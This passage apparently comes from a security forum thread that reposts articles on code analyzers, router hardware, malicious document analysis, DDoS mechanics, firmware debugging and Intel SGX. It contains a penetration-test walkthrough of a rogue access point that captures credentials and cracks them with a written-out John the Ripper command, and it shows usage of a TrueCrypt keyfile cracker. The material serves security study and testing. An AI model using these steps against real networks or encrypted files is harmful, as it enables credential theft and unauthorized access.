  14. YASCA (Yet Another Source Code Analyzer) analyzes Java, and C/C++ primarily, with other languages and JavaScript for security flaws and other bugs. Its’ creator, Michael Scovetta, aggregated many other popular static analysis tools and made it easy-to-integrate with a variety of other tools, including others on this list: FindBugs, CppCheck, and more. The tool was created in 2008 to help developers in looking for security bugs by automating part of their code review and finding the “low hanging fruit.” For more info on Yasca, check out this presentation that the creator, Michael Scovetta gave at the NY PHP Conference in ’09. The latest version, 3.0.4, was released in 2012. See the GitHub repository here. The Good: The fact that YASCA is an aggregated tool from other powerful tools, it took the best parts of each and combined for broader coverage The Not-As-Good: Broader does not mean deeper: Keep in mind that this tool was built to look for low-hanging fruits like SQL injections and XSS, so be wary of missing more serious issues. Sursa: https://github.com/scovetta/yasca
  15. This automated code security tool works with C++, C#, VB, PHP and Java to identify insecurities and other issues in the code. Developed by Nick Dunn (@N1ckDunn), the tool quickly scans and describes – in detail – the issues it finds, offering an easy-to-use interface. The Good: Allows for custom configurations for your own queries Tells you the security level of the vulnerabilities it finds Searches intelligently for specific violations of OWASP recommendations Consistently updated since its creation in 2012 The Not-As-Good: While it can analyze many languages, you have to tell it the language you’re scanning Scans for a set list of vulnerabilities that cannot be modified Isn’t fully automated Sursa: SourceForge.net: VisualCodeGrepper V2.0.0 - Project Web Hosting - Open Source Software
  16. [h=1]D-Link's new routers look crazy, but they're seriously fast[/h] by Steve Dent | @stevetdent | January 5th 2015 at 4:57 am D-Link has just jumped the router shark with its latest AC5300, AC3200 and AC3100 Ultra Performance models. On top of speeds up to 5.3Gbps for the AC5300 model, the 802.11ac devices feature, um, striking looks that hopefully won't frighten small children or animals. D-Link calls the models "attractive" with a "modern form-factor for today's homes," and we'd agree -- provided you live in some kind of rouge-accented spaceship. Performance-wise, however, the new models are definitely drool-worthy, thanks to 802.11ac tri-band beamforming speeds between 3.1- and 5.3Gbps, along with gigabit ethernet, high power antennas and onboard USB 3.0 ports. You can control the devices with a smartphone or tablet, and D-Link also outed an optional DWA-192 USB 3.0 adapter, which connects to laptops and PCs to give them an 802.11ac connection. The AC3200 model will run $310 and is available now from NewEgg, while the rest of the pricing and models will come next quarter. On top of the wireless stuff, D-Link also announced new PowerLine HomePlug kits, with speeds up to 2Gbps. The company says the DHP-701AV (2Gbps) and DHP-601AV (1Gbps) adapters use the fastest two wires in a typical three-wire power installation with pushbutton connection for ease of installation and security. Both kits comes with two adapters and will run $130 (DHP-701AV) and $80 (DHP-601AV), with both arriving later this quarter. Sursa: D-Link's new routers look crazy, but they're seriously fast
  17. [h=3]Professionally Evil: This is NOT the Wireless Access Point You are Looking For[/h] I was recently conducting a wireless penetration test and was somewhat disappointed (but happy for our client) to find that they had a pretty well configured set of wireless networks. They were using WPA2 Enterprise and no real weaknesses that I could find in their setup. After conducting quite a bit of analysis on network captures and looking for any other source of weakness, I finally concluded that I wasn't going to get anywhere with the approaches I was taking. Rather than giving up and leaving it at that, I decided to go after the clients using the network and see what I could get them to do. I had a a laptop and a number of iOS, Android and Palm devices at my disposal, so how would they respond to a fake access point? I decided to setup a fake access point (AP) using a matching SSID, which we will call "FOOBAR" for our purposes. I downloaded the latest version of hostapd (2.0 as of this post) and set it up to be use WPA2 Enterprise and configured Freeradius-WPE as the fake authentication system. The goal was to have a client connect to my evil AP and then give me their credentials. Freeradius-WPE came pre-installed on my laptop running Backtrack, so no real work there. About all I did was install a valid SSL certificate for use by the radius daemon. Unfortunately, I could never get Freeradius-WPE to handle the CA certificate chain correctly and that had an impact on my attack later on. If you don't care about a valid TLS certificate, then start Freeradius-WPE on Backtrack by running "radius -X". The -X will cause the daemon to setup self signed TLS certificates automatically. With that done, I moved on to installing hostapd. At first I installed hostapd from the apt repositories already setup in Backtrack. Unfortunately, there was an issue with that version and my setup, which caused it to fail at startup. To get around this, I downloaded and installed the app from source and the problem went away. Below is my hostapd.conf file. This config is largely based off of some searches for default configurations of hostapd and then I researched the settings that I needed to have to get WPA2 Enterprise working. The critical pieces to doing that were setting wpa=1 and then setting wpa_key_mgmt=WPA-EAP. I also made sure that hostapd was pointed to my radius server and had the correct password to access it. Last, I set my SSID to match our client's environment (or in in this example used "FooBar"). To get hostapd running, I ran "hostapd hostapd.conf" and I was up and running. I picked up my test iPhone and found FooBar in my list of available networks. When I selected this network, I was prompted for my test account's username and password. So far so good... Then I hit a major snag in making this attack invisible. The SSL certificate chain was not being presented properly, so my cert showed up as invalid. After a bit of troubleshooting and a dwindling testing window for this attack, I finally had to relegate fixing this to later research. And honestly, if someone was presented with an invalid certificate the chances are pretty high I'd get someone to click on it in spite of this warning. I accepted this warning and proceeded on with my test. The credentials were sent to my fake AP and Freeradius-WPE captured my credentials. The password doesn't get sent across, but that's hardly an issue in this case. I'm using a really dumb password for our example and John the Ripper with a good password list will have no issues with it. All we need to do is take the username and hashes and put them into a text file in the format that john expects for NETNTLM hashes. This involves removing all the colons in the hashes and getting them delimited properly for the expected format. My two entries end up looking like this in my capture file. Finally, I turn John loose on the hashes by running "john -w:/pentest/passwords/wordlists/rockyou.txt --format=NETNTLM hashes.txt". As expected, the hashes broke within seconds. At this point the attacker wins by using these credentials to log into the targeted network and proceeds with whatever the next step in their attack is. There were a few steps to get to this point, but really it was pretty straight forward. Happy pen testing! Jason Wood is a Senior Security Consultant with Secure Ideas. If you are in need of a penetration test or other security consulting services you can contact him at jason@secureideas.com or visit the Secure Ideas - Professionally Evil site for services provided. Posted by Jason Wood at 9:18 PM Sursa: Secure Ideas: Professionally Evil!: Professionally Evil: This is NOT the Wireless Access Point You are Looking For
  18. What It Looks Like: Disassembling A Malicious Document I recently analyzed a malicious document, by opening it on a virtual machine; this was intended to simulate a user opening the document, and the purpose was to determine and document artifacts associated with the system being infected. This dynamic analysis was based on the original analysis posted by Ronnie from PhishMe.com, using a copy of the document that Ronnie graciously provided. After I had completed the previous analysis, I wanted to take a closer look at the document itself, so I disassembled the document into it's component parts. After doing so, I looked around on the Internet to see if there was anything available that would let me take this analysis further. While I found tools that would help me with other document formats, I didn't find a great deal that would help me this particular format. As such, I decided to share what I'd done and learned. The first step was to open the file, but not via MS Word...we already know what happens if we do that. Even though the document ends with the ".doc" extension, a quick look at the document with a hex editor shows us that it's format is that of the newer MS Office document format; i.e., compressed XML. As such, the first step is to open the file using a compression utility, such as 7Zip, as illustrated in figure 1. [TABLE=class: tr-caption-container] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Figure 1: Document open in 7Zip[/TD] [/TR] [/TABLE] As you can see in figure 1, we now have something of a file system-style listing that will allow us to traverse through the core contents of the document, without actually having to launch the file. The easiest way to do this is to simply extract the contents visible in 7Zip to the file system. Many of the files contained in the exported/extracted document contents are XML files, which can be easily viewed using viewers such as Notepad++. Figure 2 illustrates partial contents for the file "docProps/app.XML". [TABLE=class: tr-caption-container] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Figure 2: XML contents[/TD] [/TR] [/TABLE] Within the "word" folder, we see a number of files including vbaData.xml and vbaProject.bin. If you remember from PhishMe.com blog post about the document, there was mention of the string 'vbaProject.bin', and the Yara rule at the end of the post included a reference to the string “word/_rels/vbaProject.bin”. Within the "word/_rels" folder, there are two files...vbaProject.bin.rels and document.xml.rels...both of which are XML-format files. These documents describe object relationships within the overall document file, and of the two, documents.xml.rels is perhaps the most interesting, as it contains references to image files (specifically, "media/image1.jpg" and "media/image2.jpg"). Locating those images, we can see that they're the actual blurred images that appear in the document, and that there are no other image files within the extracted file system. This supports our finding that clicking the "Enable Content" button in MS Word did nothing to make the blurred documents readable. Opening the word/vbaProject.bin file in a hex editor, we can see from the 'magic number' that the file is a structured storage, or OLE, file format. The 'magic number' is illustrated in figure 3. [TABLE=class: tr-caption-container] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Figure 3: vbaProject.bin file header[/TD] [/TR] [/TABLE] Knowing the format of the file, we can use the MiTeC Structured Storage Viewer tool to open this file and view the contents (directories, streams), as illustrated in figure 4. [TABLE=class: tr-caption-container] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Figure 4: vbaProject[/TD] [/TR] [/TABLE] Figure 5 illustrates another view of the file contents, providing time stamp information from the "VBA" folder. [TABLE=class: tr-caption-container] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Figure 5: Time stamp information[/TD] [/TR] [/TABLE] Remember that the original PhishMe.com write-up regarding the file stated that the document had originally been seen on 11 Dec 2014. This information can be combined with other time stamp information in order to develop an "intel picture" around the infection itself. For example, according to VirusTotal, the malicious .exe file that was downloaded by this document was first seen by VT on 12 Dec 2014. The embedded PE compile time for the file is 19 June 1992. While time stamps embedded within the document itself, as well as the PE compile time for the 'msgss.exe' file may be trivial to modify and obfuscate, looking at the overall wealth of information provides analysts with a much better view of the file and its distribution, than does viewing any single time stamp in isolation. If we continue navigating through the structure of the document, and go to the VBA\ThisDocument stream (seen in figure 4), we will see references to the files (batch file, Visual Basic script, and Powershell script) that were created within the file system on the infected system. Summary My goal in this analysis was to see what else I could learn about this infection by disassembling the malicious document itself. My hope is that the process discussed in this post will serve as an initial roadmap for other analysts, and be extended in the future. Tools Used 7Zip Notepad++ Hex Editor (UltraEdit) MiTeC Structured Storage Viewer Resources Lenny Zeltser's blog - Analyzing Malicious Documents Cheat Sheet Virus Bulletin presentation (from 2009) Kahu Security blog post - Dissecting a Malicious Word document Document-Analyzer.net - upload documents for analysis Posted by Harlan Carvey at 8:37 AM Sursa: Windows Incident Response: What It Looks Like: Disassembling A Malicious Document
  19. TrueCrypt key file cracker. [h=1]Usage[/h] python tckfc.py [-h] [-c [COMBINATION]] keyfiles tcfile password mountpoint keyfiles: Possible key files directory tcfile: TrueCrypt encrypted file password: Password for TrueCrypt file mountpoint: Mount point [h=1]Example[/h] mkdir mnt cp a.pdf keys/ cp b.doc keys/ cp c.txt keys/ cp d.jpg keys/ cp e.gif keys/ python tckfc.py keys/ encrypted.img 123456 mnt/ Sursa: https://github.com/Octosec/tckfc
  20. [h=1]Distributed Denial Of Service (DDoS) for Beginners[/h] Distributed Denial Of Service, or DDoS, is an attack in which multiple devices send data to a target device (usually a server), with the hope of rendering the network connection or a system application unusable. There are many forms of DDoS attack, but almost all modern attacks are either at Layer 4 (The Transport Layer) or Layer 7 (The Application Layer), I'll cover both of these in depth. Although DDoS attacks can occur between almost any devices, I'll refer to the attacker as the client and the victim as the server. [h=2]Layer 4 (Transport Layer)[/h] TCP, USD, SCTP, DCCP and RSVP are all examples of Layer 4 protocols; however, we'll focus on UDP as this is most commonly utilized for DDoS attacks. UDP is generally preferred over TCP based attacks because TCP requires a connection to be made before any data can be send; if the server or firewall refuses the connection, no data can be sent, thus the attack cannot proceed. UDP allows for the client to simply send data to the server without first making a connection, It's similar to the way in which mail reaches your house without your authorizartion, you can do whatever you want with it once you receive it, but you are still going to receive it. This is why software firewalls are useless against UDP attacks, because by the time the packet has reached your server, it's already traveled through your server's datacenter. If the datacenter's router is on a 1gb/s connection and more than 1gb/s of UDP packets are being sent, the router is going to be physically unable to process them all, rendering your server inaccessible (regardless of if the server processes the packets or not). The basic idea of UDP is to saturate the connection, rather than over-stress the server by sending it too much data. If the attack is powerful enough, it won't even need to reach the server, it can simply overload an upstream device responsible for routing data to the target server (or even that region of the datacenter). [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]The worst datacenter you ever saw.[/TD] [/TR] [/TABLE] If we consider our hypothetical, inaccurate and oversimplified datacenter: We have a 3 Gb/s line connecting section 1 of the datacenter to the rest of the network, that 3 Gb/s line is then split into 3x 1 Gb/s lines for each of the 3 racks, each rack contains 3 servers, so each 1 Gb/s line is split into 3x 333 Mb/s lines. Let's assume all 3 servers in rack 1 have the world's best firewall; it might protect them all from DDoS, but if the attack exceeds 333 MB/s, the server will be offline regardless, if the attack exceeds 1 Gb/s the rack will be offline, and if the attack exceeds 3 GB/s the entire section will be offline. No matter how good the server's firewall is, the server will be offline if the upstream routers cripple under the load, it's theoretically possible to take offline an entire datacenter or even a whole country by sending a large enough attack to one server withing that datacenter/country. Mitigation of UDP attacks can only be performed by the datacenter themselves by deploy specialized routers (commonly known as hardware firewalls) at strategical points within the network. The aim is to filter out some of the DDoS at stronger parts of the network, before it reaches the downstream routers. A common method of "mitigation" among lazy ISPs is to simply stop routing any traffic to the IP address being attacked (known as null routing), this results in the server being offline until the datacenter staff decide otherwise, meaning the attacker can stop attacking and enjoy a nice nap. [h=2]Layer 7 (Application Layer)[/h] Layer 7 DDoS attacks are probably the easiest to carry out in terms of resources needed, because the idea is not to over-saturate the network, but to simply lock up an application on the server. Due to the fact the attack isn't taking offline the whole server, it's easy for the sysadmin to login and begin to mitigation. An example of a Layer 7 attack against a website would be to constantly send GET requests to a page which performs lots of SQL queries; most SQL servers have a limit on the amount of queries they can process at one time, any more and the server will have to start denying requests, preventing legitimate clients from using the website. Attackers don't even need to flood the server with requests, it's possible to simply overload the application by maintaining open connections (without sending tonnes of data). Slowloris is an example of such attack where the attacker opens connections to the HTTP server and sends HTTP requests bit by bit, as slowly as possible. The server cannot process a request until it's complete, so it just waits indefinitely until the entire request has been sent; once the maximum number of clients is hit, the server will just ignore any new clients until it's done with the old (of course the old clients are just going to continue adding useless data to the HTTP request, keeping the connection busy for as long as they can). [h=2]DDoS Amplification[/h] DDoS amplification is nothing new, it has actually been around so long that Microsoft patched their OS to try and prevent attacks (I'll go over this later). Amplification attacks are nearly always UDP because it does not require a connection, UDP packets operate a lot like a letter in the mail: they have a return address (known as the source address) in which the server will reply to, but as with any letter, there is no guarantee the return address matches that of whoever sent it. For an amplification attack to work, we first need a service that works over UDP and has a response message that is larger than the request message. A good example of this is a DNS query: the request to lookup the DNS is only about 60 bytes, but the UDP DNS response can be as large as 4000 bytes (due to long txt records), that's a 1:67 amplification ratio. All the attacker needs to do is find a DNS that when queried will result in a large response, then send a query to said DNS with the victims IP and the source address, resulting in the DNS server sending the response to the victim instead of the attacker. Due to the size different between a DNS request and DNS response, an attacker can easily transform a botnet capable of outputting 1 Gb/s worth of requests into 60 Gb/s DDoS attack, this is a huge problem. In order to mitigate these kinds of attacks, Microsoft introduced an update to the windows network stack in XP SP2, which would prevent the system from sending UDP packets with a source address other than its own. Some ISPs took a similar approach by inspecting outgoing UDP packets and dropping any which did not contain a source address owned by the sender. As a result of such measures, Amplified DDoS attacks are primarily sent from linux servers running in a datacenter that does not implement source address verification. [h=2]Who Can Perform DDoS Attacks?[/h] In the past DDoS attacks were only for seasoned hackers with large botnets under their control, due to the fact home computers don't have much bandwidth, requiring hundreds, if not thousands, of them to take offline a single server. Nowadays people can just buy (or hack) servers and use them to perform attacks; a botnet of as little as 2 servers can take offline most website. An attacker doesn't even need to acquire their own servers, there are many services utilizing bought/hacked servers to perform DDoS attacks for as little as a $5/month subscription fee. It is also believed that Lizard Squad were able to take offline massive services such as PSN and XBL by abusing the Google Cloud free trial, using the virtual servers as DDoS bots. Sursa: http://www.malwaretech.com/2015/01/distributed-denial-of-service-ddos-for.html
  21. Remote Debugging with QEMU and IDA Pro It's often the case, when analyzing an embedded device's firmware, that static analysis isn't enough. You need to actually execute a binary you're analyzing in order to see how it behaves. In the world of embedded Linux devices, it's often fairly easy to put a debugger on the target hardware for debugging. However it's a lot more convenient if you can run the binary right on your own system and not have to drag hardware around to do your analysis. Enter emulation with QEMU. An upcoming series of posts will focus on reverse engineering the UPnP daemon for one of Netgear's more popular wireless routers. This post will describe how to run that daemon in system emulation so that it can analyzed in a debugger. Prerequisites First, I'd recommend reading the description I posted of my workspace and tools that I use. Here's a link. You'll need an emulated MIPS Linux environment. For that, I'll refer readers to my previous post on setting up QEMU. You'll also need a MIPS Linux cross compiler. I won't go into the details of setting this up because cross compilers are kind of a mess. Sometimes you need an older toolchain, and other times you need a newer toolchain. A good starting point is to build both big endian and little endian MIPS Linux toolchains using the uClibc buildroot project. In addition to that, whenever I find other cross compiling toolchains, I save them. A good source of older toolchains is the GPL release tarballs that vendors like D-Link and Netgear make available. Once you have a cross compiling toolchain for your target architecture, you'll need to build GDB for that target. At the very least, you'll need gdbserver statically compiled for the target. If you want to remotely debug using GDB, you'll need gdb compiled to run on your local architecture (e.g., x86-64) and to debug your target architecture (e.g., mips or mipsel). Again, I won't go into building these tools, but if you have your toolchains set up, it shouldn't be too bad. I use IDA Pro, so that's how I'll describe remote debugging. However, if you want to use gdb check out my MIPS gdbinit file: https://github.com/zcutlip/gdbinit-mips Emulating a Simple Binary Assuming you've gotten the tools described above set up and working properly, you should now be able to SSH into your emulated MIPS system. As described in my Debian MIPS QEMU post, I like to bridge QEMU's interface to VMWare's NAT interface so I can SSH in from my Mac, without first shelling into my Ubuntu VM. This also allows me to mount my Mac's workspace right in the QEMU system via NFS. That way whether I'm working in the host environment, in Ubuntu, or in QEMU, I'm working with the same workspace. zach@malastare:~ (130) $ ssh root@192.168.127.141 root@192.168.127.141's password: Linux debian-mipsel 2.6.32-5-4kc-malta #1 Wed Jan 12 06:13:27 UTC 2011 mips root@debian-mipsel:~# mount /dev/sda1 on / type ext3 (rw,errors=remount-ro) malastare:/Users/share/code on /root/code type nfs (rw,addr=192.168.127.1) root@debian-mipsel:~# cd code root@debian-mipsel:~/code# Once shelled into your emulated system, cd into the extracted file system from your device's firmware. You should be able to chroot into the firmware's root file system. You need to use chroot since the target binary is linked against the firmware's libraries and likely won't work with Debian's shared libraries. root@debian-mipsel:~# cd code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs/ root@debian-mipsel:~/code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs# file ./bin/ls ./bin/ls: symbolic link to `busybox' root@debian-mipsel:~/code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs# file ./bin/busybox ./bin/busybox: ELF 32-bit LSB executable, MIPS, MIPS32 version 1 (SYSV), dynamically linked (uses shared libs), stripped root@debian-mipsel:~/code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs# chroot . /bin/ls -l /bin/busybox -rwxr-xr-x 1 10001 80 276413 Sep 20 2012 /bin/busybox root@debian-mipsel:~/code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs# In the above example, I have changed into the root directory of the extracted file system. Then using the file command I show that busybox is a little endian MIPS executable. Then I chrooted into the extracted root directory and ran bin/ls, which is a symlink to busybox. If you attempt to simply start a chrooted shell with "chroot .", it won't work. Your user's default shell is bash, and most embedded devices don't have bash. root@debian-mipsel:~/code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs# chroot . chroot: failed to run command `/bin/bash': No such file or directory root@debian-mipsel:~/code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs# Instead you can chroot and execute bin/sh: root@debian-mipsel:~/code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs# chroot . /bin/sh BusyBox v1.7.2 (2012-09-20 10:26:08 CST) built-in shell (ash) Enter 'help' for a list of built-in commands. # # # exit root@debian-mipsel:~/code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs# Hardware Workarounds Even with the necessary tools and emulation environment set up and working properly, you can still run into roadblocks. Although QEMU does a pretty good job of emulating the core chipset, including the CPU, there is often hardware the binary you're trying to run is expecting that QEMU can't provide. If you try to emulate something simple like /bin/ls, that will usually work fine. But something more complicated such as the UPnP daemon will almost certainly have particular hardware dependencies that QEMU isn't going to satisfy. This is especially true for programs whose job it is to manage the embedded system's hardware, such as turning wireless adapters on or off. The most common problem you will run into when running system services such as the web server or UPnP daemon is the lack of NVRAM. Non-volatile RAM is usually a partition of the device's flash storage that contains configuration parameters. When a daemon starts up, it will usually attempt to query NVRAM for its run-time configuration. Sometimes a daemon will query NVRAM for tens or even hundreds of parameters. To work around the lack of NVRAM in emulation, I wrote a library called nvram-faker. The nvram-faker library should be preloaded using LD_PRELOAD when you run your binary. It will intercept calls to nvram_get(), normally provided by libnvram.so. Rather than attempting to query NVRAM, nvram-faker will query an INI-style configuration file that you provide. The included README provides a more complete description. Here's a link to the project: https://github.com/zcutlip/nvram-faker Even with NVRAM solved, the program may make assumptions about what hardware is present. If that hardware isn't present, the program may not run or, if it does run, it may behave differently than it would on the target hardware. In this case, you may need to patch the binary. The specifics of binary patching vary from one situation to another. It really depends on what hardware is expected, and what the behavior is when it is absent. You may need to patch out a conditional branch that is taken if hardware is missing. You may need to patch out an ioctl() to a special device if you're trying to substitute a regular file for reading and writing. I won't cover patching in detail here, but I did discuss it briefly in my BT HomeHub paper and the corresponding talk I gave at 44CON. Here is a link to those resources: http://shadow-file.blogspot.com/2013/09/44con-resources.html Attaching the Debugger Once you've got your binary running in QEMU, it's time to attach a debugger. For this, you'll need gdbserver. Again, this tool should be statically compiled for your target architecture because you'll be running it in a chroot. You'll need to copy it into the root directory of the extracted filesystem. # ./gdbserver Usage: gdbserver [OPTIONS] COMM PROG [ARGS ...] gdbserver [OPTIONS] --attach COMM PID gdbserver [OPTIONS] --multi COMM COMM may either be a tty device (for serial debugging), or HOST:PORT to listen for a TCP connection. Options: --debug Enable general debugging output. --remote-debug Enable remote protocol debugging output. --version Display version information and exit. --wrapper WRAPPER -- Run WRAPPER to start new programs. --once Exit after the first connection has closed. # You can either attach gdbserver to a running process, or use it to execute your binary directly. If you need to debug initialization routines that only happen once, you'll want to do the latter. On the other hand, you may want to wait until the daemon forks. As far as I know there's no way to have IDA follow forked processes. You need to attach to them separately. If you do it this way, you can attach to the already running process from outside the chroot. The following shell script will execute upnpd in a chroot. If DEBUG is set to 1, it will attach to upnpd and pause for a remote debugging session on port 1234. #!/bin/sh ROOTFS="/root/code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs" chroot $ROOTFS /bin/sh -c "LD_PRELOAD=/libnvram-faker.so /usr/sbin/upnpd" #Give upnpd a bit to initialize and fork into the background. sleep 3; if [ "x1" = "x$DEBUG" ]; then $ROOTFS/gdbserver --attach 0.0.0.0:1234 $(pgrep upnpd) fi You can create a breakpoint right before the call to recvfrom() and then verify the debugger breaks when you send upnpd an M-SEARCH packet. Then, in IDA, go to Process Options under the Debugger menu. Set "hostname" to the IP address of your QEMU system, and set the port to the port you have gdbserver listening on. I use 1234. Accept the settings, then attach to the remote debugging session with IDA's ctrl+8 hotkey. Hit ctrl+8 again to resume execution. You should be able to send an M-SEARCH packet[1] and see the debugger hit the breakpoint. There is obviously a lot more to explore, and there are lots of situations that can come up that aren't addressed here, but hopefully this gets you started. [1] I recommend Craig Heffner's miranda tool for UPnP analysis: https://code.google.com/p/miranda-upnp/ Posted by Zach Cutlip at 3:05:00 PM Sursa: http://shadow-file.blogspot.kr/2015/01/dynamically-analyzing-wifi-routers-upnp.html
  22. Intel® Software Guard Extensions (SGX): A Researcher’s Primer Monday January 5, 2015 tl;dr Intel SGX is a trusted execution environment which provides a reverse sandbox. It’s not yet available but those who have had access to the technology have shown some powerful applications in cloud use cases that on the face of it dramatically enhance security without the performance constraints of homomorphic encryption. However, there is enough small print to warrant both validation and defensive assessment activities when the technology becomes more generally available. Introduction There is a new set of features coming to Intel CPUs that have massive potential for cloud security and other applications such as DRM. However, as with all things that can be used for good there is also the potential for misuse. These features come in the guise of Software Guard Extensions (SGX). In this post we’ve collated what we know about the technology, what others have said about it and how it is being applied in real-world applications. What is SGX? To quote Intel: Intel® Software Guard Extensions (Intel® SGX) is a name for Intel Architecture extensions designed to increase the security of software through an “inverse sandbox” mechanism. In this approach, rather than attempting to identify and isolate all the malware on the platform, legitimate software can be sealed inside an enclave and protected from attack by the malware, irrespective of the privilege level of the latter. So in short this means we can create a secure enclave (or a Trusted Execution Environment – TEE – if you wish) at the CPU level which is protected from the OS upon which it is running. Architecturally Intel SGX is a little different from ARM TrustZone (TZ). With TZ we often think of a CPU which is in two halves i.e. the insecure world and the secure world. Communication with the secure world occurs from the insecure world via the SMC (Secure Monitor Call) instruction. In Intel SGX model we have one CPU which can have many secure enclaves (islands): Source: Intel® Software Guard Extensions Programming Reference Rev 2 (#329298-002) – Page 13 Intel SGX is like the Protected Processes Microsoft introduced in Windows Vista but with the added benefit that it is hardware enforced so that even the underlying OS kernel can’t tamper or snoop. Intel® and Third Party High-Level and Low-Level Background Material Intel provides a background as to the design goals of SGX in a series of three (currently) blog posts: Intel® SGX for Dummies (Intel® SGX Design Objectives) : September 2013, Matthew Hoekstra Intel® SGX for Dummies – Part 2 : June 2014, Matthew Hoekstra Intel® SGX for Dummies – Part 3 : September 2014, Matthew Hoekstra Three other useful resources from Intel on how SGX actually works come in the guise of: Innovative Instructions and Software Model for Isolated Execution: June 2013, Frank McKeen, Ilya Alexandrovich, Alex Berenzon, Carlos Rozas, Hisham Shafi, Vedvyas Shanbhogue and Uday Savagaonkar, Intel Corporation Intel® Software Guard Extensions(Intel® SGX) Instructions and Programming Model: June 2013, Frank McKeen, Ilya Alexandrovich, Alex Berenzon, Carlos Rozas, Vedvyas Shanbhogue and Uday Savagaonkar, Intel Corporation Intel® Software Guard Extensions(Intel® SGX): November 2013, Carlos Rozas, Intel Labs (given at CMU) Intel® Software Guard Extensions Programming Reference Rev 2 (#329298-002): October 2014 Intel® Software Guard Extensions Programming Reference Rev 1 (#329298-001) was published in September 2013 From the Microsoft Haven research (see later) we know that revision 2 of the SGX specifications resolved issues with: Exception handling: page faults and general protection faults were not reported in the enclave. Permitted instructions: CPUID, RDTSC and IRET where not permitted previously. Of these RDTSC and IRET now are. Thread-local storage: there were problems due to segment register usage which has been fixed. Finally a good third-party presentation on Intel SGX is from the Technische Universität Darmstadt, Germany in a lecture on embedded system security titled Trusted Execution Environments Intel SGX. It provides a good summary of the functionality and how key operations occur to save you wading through the programming manual. Previous Security Analysis While no CPUs with SGX are available nor any emulators/simulators (publically at least – see later in this post) others have passed initial comment on the potential security ramifications of SGX in both good and evil contexts over the past 18 months. Intel Software Guard Extensions (SGX) Is Mighty Interesting: July 2013, Rich Mogull - Discusses the positive applications against malware, hypervisors and potential to replace HSMs. Thoughts on Intel's upcoming Software Guard Extensions (Part 1): August 2013, Joanna Rutkowska – Initial high-level thoughts on the functionality provided and how it compliments existing Intel technologies. Thoughts on Intel's upcoming Software Guard Extensions (Part 2): September 2013, Joanna Rutkowska – Lower-level thoughts on good and bad applications for SGX. SGX: the good, the bad and the downright ugly: January 2014, Shaun Davenport & Richard Ford - Application of SGX in the Real World So how far has the application of SGX in the real world come? As already mentioned given the lack of CPU support the ability to experiment with the technology has been limited to the few. Two examples of groups who have been afforded access are Microsoft Research and the United States Air Force Academy. The application of the SGX by these two groups is quite radically different. Microsoft have focused on server side applications whilst the Air Force Academy seem to be focusing on client side use cases. Secure Enclaves-Enabled Technologies: Browser Extension According to a 2014 National Security Innovation Competition Proceedings Report on Secure Enclaves-Enabled Technologies from the United States Air Force Academy, there is at least one company who has access to the technology and has funding: Secure Enclaves-Enabled Technologies is a digital security firm to be launched in the coming year. It is born from a unique relationship between Intel Labs and the Department of Homeland Security seeking to develop a revolutionary solution to cyber security problems Then they reveal their intended application of SGX: SE Enabled Technologies seeks to exploit the capabilities of SGX through the creation of software solutions. Currently, we are seeking to compliment Intel’s hardware solution through the use of a browser extension application. Using the browser extension, we can offer a wide array of security solutions from secure storage and transmission of documents to secure video streaming. As of April 12, 2014 according to the Colorado Springs Undergraduate Research Forum proceedings things had moved on: In today’s increasingly digital world, more and more sensitive information is stored electronically, and more and more often this information comes under attack. With the continual evolution of offensive attack techniques, the need for more impressive defensive counter-measures is becoming apparent. As the requisite to fill this capability gap grows, so does the opportunity for businesses. Replacing the need for a countermeasure, recent developments in micro-processer technology have created a veritable impenetrable fortress to be placed inside modern day computer systems. The answer lies in Secure Enclaves - Enabled Technology, a software company that utilizes Intel Labs’ revolutionary Software Guard Extensions technology. Instead of relying on encryption and software, this technology is hardware-based, and is so secure that an NSA Red Team could not crack it. This technology has tremendous application to both government and private organizations concerned about security. For completing a proof of concept case with the Department of Veterans’ Affairs, Secure Enclaves – Enabled Technologies will receive $500,000 that it will channel into the development of a commercially available security software package. Further details around Secure Enclaves-Enabled Technologies can be found in the 2014 National Security Innovation Competition proceedings (page 57 onwards) including these points of interest: SGX will be a standard component of Intel’s chipsets beginning in 2015. However, new software must be developed or current software must be adapted in order to have the ability to utilize the new set of instructions provided by the chipset. Without this critical software development, the cyber security solution afforded by SGX will lie dormant. Microsoft: VC3 VC3 was published in October 2014 in the paper titled VC3: Trustworthy Data Analytics in the Cloud, for which the abstract states: We present VC3, the first practical framework that allows users to run distributed MapReduce computations in the cloud while keeping their code and data secret, and ensuring the correctness and completeness of their results. VC3 runs on unmodified Hadoop, but crucially keeps Hadoop, the operating system and the hypervisor out of the TCB; thus, confidentiality and integrity are preserved even if these large components are compromised. VC3 relies on SGX processors to isolate memory regions on individual computers, and to deploy new protocols that secure distributed MapReduce computations. VC3 optionally enforces region self-integrity invariants for all MapReduce code running within isolated regions, to prevent attacks due to unsafe memory reads and writes An interesting aspect of the Microsoft VC3 work is the adversary model they considered: We consider a powerful adversary who may control the entire software stack in a cloud provider’s infrastructure, including hypervisor and OS. The adversary may also record, replay, and modify network packets. The adversary may also read or modify data after it left the processor using probing, DMA, or similar techniques. Our adversary may in particular access any number of other jobs running on the cloud, thereby accounting for coalitions of users and data center nodes. Further, we assume that the adversary is unable to physically open and manipulate at least those SGX-enabled processor packages that reside in the cloud provider’s data centers. Microsoft: Haven Haven was presented at USENIX in October 2014 in a paper titled Shielding applications from an untrusted cloud with Haven (Slides etc. are available from USENIX.), for which the abstract states: Our prototype, Haven, is the first system to achieve shielded execution of unmodified legacy applications, including SQL Server and Apache, on a commodity OS (Windows) and commodity hardware. Haven leverages the hardware protection of 